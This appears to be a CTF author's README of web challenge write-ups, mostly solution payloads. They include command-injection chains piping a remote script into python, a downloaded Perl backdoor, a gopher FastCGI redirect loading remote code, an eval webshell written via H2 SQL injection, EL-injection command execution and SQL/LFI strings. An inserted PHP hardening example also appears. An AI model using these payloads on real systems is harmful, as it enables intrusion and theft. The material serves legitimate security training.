My CTF Web Challenges


Hi, I am Orange. This is the repo of CTF challenges I made. It contains each challenge's source code, writeup and some explanation of the idea behind it.

I am a CTFer and Bug Bounty Hunter who loves web hacking and penetration testing, so you will see that these challs are all about web. If you have any questions about these challs, you can reach me in the following ways:

  • orange@chroot.org
  • blog.orange.tw

Hope you like it :)

P.s. BTW, the Babyfirst series are my favorite of all these challenges. They are open questions to everyone and there are lots of creative solutions. If you don't have time to see all of them, please look at these at least!

  • Babyfirst
  • Babyfirst Revenge
  • Babyfirst Revenge v2

Table of Contents

  • HITCON 2017 Quals

    • BabyFirst Revenge
    • BabyFirst Revenge v2
    • SSRFme?
    • SQL so Hard
    • Baby^H Master PHP 2017
  • HITCON 2016 Quals

    • %%%
    • Leaking
    • BabyTrick
    • Angry Boy
    • Angry Seam
  • HITCON 2015 Quals

    • Babyfirst
    • nanana
    • Giraffe's Coffee
    • lalala
    • Use-After-FLEE
  • HITCON 2014 Quals

    • PUSHIN CAT
    • PY4H4SHER
    • LEENODE
  • WCTF 2016

    • BlackBox
  • AIS3 Final 2015 Final

    • SQLPWN

BabyFirst Revenge

Difficulty: ★☆
Solved: 95 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

  • Command Injection, but only in 5 bytes

Source Code

  • index.php

Solution

# generate `ls -t>g` to file "_"
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

# generate `curl orange.tw|python` to file "g"
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _

# got shell
http://host/?cmd=sh g

You can check exploit.py for the details! There are also lots of creative solutions; see the write-ups below.

Write Ups

  • HITCON CTF 2017-BabyFirst Revenge-writeup

BabyFirst Revenge v2

Difficulty: ★★★★
Solved: 8 / 1541
Tag: WhiteBox, PHP, Command Injection

Idea

  • Command Injection, but only in 4 bytes

Source Code

  • index.php

Solution

  1. generate g> ht- sl to file v
  2. reverse file v to file x
  3. generate curl orange.tw|python;
  4. execute x, ls -th >g
  5. execute g

You can check exploit.py for the details!

Write Ups

  • script.py from @bennofs

SSRFme?

Difficulty: ★★☆
Solved: 20 / 1541
Tag: WhiteBox, Perl, PATH Pollution

Idea

  • CVE-2016-1238 (but the latest version of Ubuntu 17.04 in AWS is still vulnerable)
  • Perl looks up the current directory when importing modules
  • The Perl module URI/lib/URI.pm#L136 will eval if there is an unknown scheme

Source Code

  • index.php
$ sudo apt install libwww-perl

Solution

# write evil URI module to current directory
$ curl http://host/?filename=URI/orange.pm&url=http://orange.tw/w/backdoor.pl

# eval evil module `orange`
$ curl http://host/?filename=xxx&url=orange://orange.tw

Write Ups

TBD

SQL so Hard

Difficulty: ★★★
Solved: 10 / 1541
Tag: WhiteBox, MySQL, PostgreSQL, SQL Injection, Code Injection

Idea

  • MySQL max_allowed_packet drops oversized SQL statements
  • Node-Postgres - code execution vulnerability
  • Exploit the RCE in SQL UPDATE syntax

Source Code

  • app.js

Solution

  • exploit.py

Write Ups

TBD

Baby^H Master PHP 2017

Difficulty: ★★★★☆
Solved: 0 / 1541
Tag: WhiteBox, PHP, Serialization, Apache Prefork

Idea

  • PHP does deserialization when parsing PHAR files
  • PHP assigns a predictable function name \x00lambda_%d to an anonymous function
  • Break shared VARIABLE state in Apache Pre-fork mode

Source Code

  • index.php

Solution

# get a cookie
$ curl http://host/ --cookie-jar cookie

# download .phar file from http://orange.tw/avatar.gif
$ curl -b cookie 'http://host/?m=upload&url=http://orange.tw/'

# force apache to fork new process
$ python fork.py &

# get flag
$ curl -b cookie "http://host/?m=upload&url=phar:///var/www/data/$MD5_IP/&lucky=%00lambda_1"
  • avatar.gif
  • fork.py

Write Ups

No one solved it :(

papapa

Difficulty:
Solved: 71 / 1024
Tag: BlackBox, SSL, Pentesting

Idea

  • Leak the internal hostname from SSL certificate

Source Code

  • here

Solution

$ openssl s_client -showcerts -connect 1.2.3.4:443 < /dev/null | openssl x509 -text | grep -A 1 "Subject Alternative Name"
...
depth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org
...

# get flag
$ curl -k -H "host: very-secret-area-for-ctf.orange.tw" https://1.2.3.4/

Write Ups

  • HITCON 2016
  • HITCON CTF 2016: %%% (Web) Write-up
  • [HITCON 2016] [WEB 100 - %%%] WRITE UP
  • hitcon2016 web writeup

Leaking

Difficulty: ★★
Solved: 43 / 1024
Tag: WhiteBox, JavaScript, NodeJS

Idea

  • Break JavaScript Sandbox
  • Use NodeJS Buffer(int) to steal uninitialized memory
  • Node.js Buffer knows everything

Source Code

  • here

Solution

$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;

Write Ups

  • Hello HitCon 2016 CTF
  • HITCON 2016 web summary
  • hitcon2016 web writeup

BabyTrick

Difficulty: ★★★
Solved: 24 / 1024
Tag: WhiteBox, PHP, MySQL, SQL Injection, Unserialize

Idea

  • Create an Unexpected Object and Don't Invoke __wakeup() in Deserialization
  • SugarCRM v6.5.23 PHP deserialization object injection vulnerability
  • MySQL UTF-8 collation - SELECT 'Ä'='a' is True

Source Code

  • here

Solution

# get password
curl http://1.2.3.4/?data=O:6:"HITCON":3:{s:14:"%00HITCON%00method";s:4:"show";s:12:"%00HITCON%00args";a:1:{i:0;s:39:"'union%20select%201,2,password%20from%20users%23";}}

# get flag
curl http://1.2.3.4/?data=O:6:"HITCON":2:{s:14:"%00HITCON%00method";s:5:"login";s:12:"%00HITCON%00args";a:2:{i:0;s:7:"orÄnge";i:1;s:13:"babytrick1234";}}

Write Ups

  • Hitcon 2016 – Baby Trick
  • Hello HitCon 2016 CTF
  • hitcon2016 web writeup

Angry Boy

Difficulty: ★★☆
Solved: 43 / 1024
Tag: GrayBox, Java

Idea

  • new String(new byte[] {1, -1, 1, -1}) will output 01EFBFBD01EFBFBD, not 01FF01FF
  • When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions

Source Code

  • here

Solution

  • exploit.py
  • decrpt.py

Write Ups

  • Angry Boy - Web 300 Problem

Angry Seam

Difficulty: ★★★★
Solved: 4 / 1024
Tag: GrayBox, Java, Seam Framework, CSS RPO, EL Injection, Java Deserialization

Idea

  • CSS Relative Path Overwrite
  • Built-in redirection parameter actionOutcome
  • RPO Gadgets
  • CVE-2010-1871: JBoss Seam Framework remote code execution

Source Code

  • here

Solution


P.s. I made this challenge because once, when I tried to review the code of the Seam Framework, I found some 0-days and thought there must be more. So I threw out a brick to attract jade, and the result was more than I expected :P


Intended solution

  • Register an account

    username: `AAAAAA`
    password: `AAAAAA`
    realname: `{/*';*/}%0a@import'http://orange.tw/?`
  • Report URL

    http://1.2.3.4:8080/angryseam/profile.seam?actionOutcome=/profile.seam?username%3dAAAAAA

Unintended solution

  • Register an account
  • Update description to

    /?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}
  • Login and access

    GET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1
    host: 1.2.3.4
    cmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}
    ccc: ls -alh
    ...

Unintended solution

  • CVE-2013-2165 Java deserialization vulnerability

Unintended solution

  • SESSION manipulation... seam SUCKS

Write Ups

  • Web500 Hitconctf 2016 and exploit CVE-2013-2165
  • Angry Seam (500 pts)

Babyfirst

Solved: 33 / 969
Difficulty: ★★
Tag: WhiteBox, PHP, Command Injection

Idea

  • Use NewLine to bypass regular expression check
  • Command injection only with alphanumeric characters

Source Code

  • here
<?php
    highlight_file(__FILE__);

    // every client gets its own sandbox directory, keyed by source address
    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);

    // each argument must look like a single \w+ token (note: '$' still
    // matches before a trailing newline, which is the intended weakness)
    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) )
            exit();
    }
    exec("/bin/orange " . implode(" ", $args));
?>
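As an added example (not code from the challenge repo; the function names are assumptions), the argument check above beside a hardened form: in PCRE, `$` also matches just before a final newline, which is what the `%0a` in the solution relies on, while `\A...\z` (or the `D` modifier) anchors at the true end of the string.

```php
<?php
// Added example, not part of the challenge repo. Function names are assumptions.
// In PCRE (and therefore preg_match), '$' matches at the very end of the subject
// OR just before a final "\n", so '/^\w+$/' accepts "x\n". That is the gap the
// %0a in the Babyfirst solution goes through.

function babyfirst_check(string $arg): bool
{
    // The check as written in index.php: a trailing newline slips through.
    return preg_match('/^\w+$/', $arg) === 1;
}

function hardened_check(string $arg): bool
{
    // \A and \z anchor at the absolute start and end of the subject, so a
    // trailing newline is rejected. The D modifier ('/^\w+$/D') is the
    // equivalent fix if you prefer to keep '$'.
    return preg_match('/\A\w+\z/', $arg) === 1;
}

function build_command(array $args): ?string
{
    // Defence in depth: validate strictly AND quote every argument, so even a
    // value that passed validation is never interpreted by the shell.
    foreach ($args as $arg) {
        if (!is_string($arg) || !hardened_check($arg)) {
            return null;
        }
    }
    return '/bin/orange ' . implode(' ', array_map('escapeshellarg', $args));
}

// Constructed inputs: the newline-terminated value from the challenge solution
// and a benign argument list.
$probe = "x\n";
printf("original check accepts \"x\\n\": %s\n", babyfirst_check($probe) ? 'yes' : 'no');
printf("hardened check accepts \"x\\n\": %s\n", hardened_check($probe) ? 'yes' : 'no');
var_dump(build_command(['x', "mkdir\n"]));
var_dump(build_command(['aa', 'bb']));
```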

Solution

http://localhost/?args[0]=x%0a&args[1]=mkdir&args[2]=orange%0a&args[3]=cd&args[4]=orange%0a&args[5]=wget&args[6]=846465263%0a
http://localhost/?args[0]=x%0a&args[1]=tar&args[2]=cvf&args[3]=aa&args[4]=orange%0a&args[5]=php&args[6]=aa

There are also lots of creative solutions; see the write-ups below.

Write Ups

  • babyfirst (web 100)
  • HITCON CTF 2015 Web 100 Web 300 Writeup
  • HITCON 2015 Quals: Babyexploit
  • Babyfirst (web, 100p, ?? solves)

nanana

Difficulty: ★★★
Solved: 18 / 969
Tag: GrayBox, C, PWN

Idea

  • Pwn without library
  • Format String without output
  • Bypass stack guard by overflowing ARGV[1]

Source Code

  • here

Solution

  • exploit.py

Write Ups

  • nanana (pwn, web 200)
  • HITCON 2015 Quals: Nanana
  • Pwning (sometimes) with style - Dragons’ notes on CTFs

Giraffe's Coffee

Difficulty: ★★★☆
Solved: 16 / 969
Tag: WhiteBox, PHP

Idea

  • Break PHP PRNG
  • Break shared PRNG STATE in Apache Prefork mode

Source Code

  • here

Solution

TBD

Write Ups

  • HITCON CTF 2015 Web 100 Web 300 Writeup
  • Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)
  • HITCON 2015 WEB 300

lalala

Difficulty: ★★★☆
Solved: 2 / 969
Tag: BlackBox, PHP, SSRF

Idea

  • Bypass SSRF restriction with 302 redirect
  • Exploit FASTCGI protocol by using GOPHER

Source Code

  • here

Solution

<?php
header( "Location: gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00" );

Write Ups

  • HITCON CTF 2015 Web 100 Web 300 Writeup
  • Hitcon 2015 lalala web400 task

Use-After-FLEE

Solved: 1 / 969
Difficulty: ★★★★☆
Tag: WhiteBox, PHP, UAF, PWN

Idea

  • Bypass open_basedir
  • Bypass disable_functions
  • PHP use-after-free exploit writing
  • Bypass full protection (DEP / ASLR / PIE / FULL RELRO)
  • Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList

Source Code

  • here

Solution

TBD

Write Ups

  • Use-After-FLEE (pwn, web 500)

PUSHIN CAT

Solved: 8 / 1020
Difficulty: ★★
Tag: BlackBox, PHP, H2, SQL Injection

Idea

  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection

Source Code

  • here

Solution

TBD

Write Ups

  • HITCON CTF 2014: PUSHIN CAT
  • HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)
  • HITCON CTF 2014

PY4H4SHER

Solved: 30 / 1020
Difficulty: ★★☆
Tag: WhiteBox, Python, Collision, HPP

Idea

  • Python CGI HTTP Pollution
  • MySQL old_password hash collisions
  • PBKDF2+HMAC hash collisions explained

Source Code

  • here

Solution

TBD  

Write Ups

  • HITCON CTF 2014: PY4H4SHER
  • HITCON CTF 2014: PY4H4SHER WRITEUP
  • py4h4sher_solution.py
  • HITCON CTF 2014

LEENODE

Solved: 2 / 1020
Difficulty: ★★★
Tag: BlackBox, ColdFusion, Apache

Idea

  • Multilayered architecture vulnerability
  • Double Encoding

Source Code

  • here

Solution

# get password
$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm

# get flag
$ curl http://1.2.3.4/admin/thefl4g.txt

Write Ups

  • HITCON CTF 2014: LEENODE
  • (web) LEENODE [250]
  • CTF/Writeup/HITCON2014/LEENODE

BlackBox

Solved: 0 / 12
Difficulty: ★★★★
Tag: GrayBox, PHP, JAVA, mod_jk, H2, SQL Injection, WAF

Idea

  • Multilayered architecture vulnerability
  • Default and up-to-date mod_jk leads to directory traversal
  • Bypass WAF by incorrect usage of BASE64 and URLENCODE
  • SQL Injection on H2 Database
  • Execute Code by using H2 SQL Injection

Source Code

  • here

Solution

  • Get source code

    http://1.2.3.4/login/..;/
  • Review code and find a way to bypass WAF

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--"
    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--"
  • Write shell

    $ curl "http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--"
    $ curl "http://1.2.3.4/write_shell_here_=P/.a.php" -d 'phpinfo();'

Write Ups

TBD

SQLPWN

Solved: 0 / ??
Difficulty: ★★★
Tag: WhiteBox, PHP, SQL Injection, LFI, Race Condition

Idea

  • One-byte off SQL Injection
  • Race Condition
  • Local file inclusion with PHP session

Source Code

  • here

Solution

  • Run exploit.py to win race condition

  • Login and SQL Injection

    $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\&note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'
  • Local file inclusion with session

    $ curl http://1.2.3.4/sqlpwn.php?mode=admin&boom=../../../../../../var/lib/php5/sess_243220

Write Ups

  • AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
  • AIS3 CTF Final Web1 & Web2